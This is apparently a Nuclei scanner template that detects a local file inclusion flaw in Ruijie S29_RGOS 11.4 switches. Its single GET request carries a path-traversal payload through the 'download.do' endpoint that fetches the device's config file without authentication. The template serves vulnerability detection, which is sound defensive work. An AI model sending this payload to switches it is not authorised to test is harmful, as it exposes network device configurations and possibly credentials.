id: ruijie-networks-lfi

info:
  name: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Ruijie Networks Switch eWeb S29_RGOS 11.4 is vulnerable to local file inclusion and allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
  reference:
    - https://exploit-db.com/exploits/48755
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: ruijie,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/download.do?file=../../../../config.text"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'filename="config.text"'
          - "Content-Type: application/octet-stream"
        part: header

      - type: word
        words:
          - "version S29_RGOS 11.4"
        part: body
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a004730450221009ceba387c1b4ca233133587e3ea34cb907e26565001da07efdcd5deb86daeb0e0220477f8dc763ae5d1e7615a2633d3f67eb8009e6df46642aee1252ced878d065d3:922c64590222798bb761d5b6d8e72950
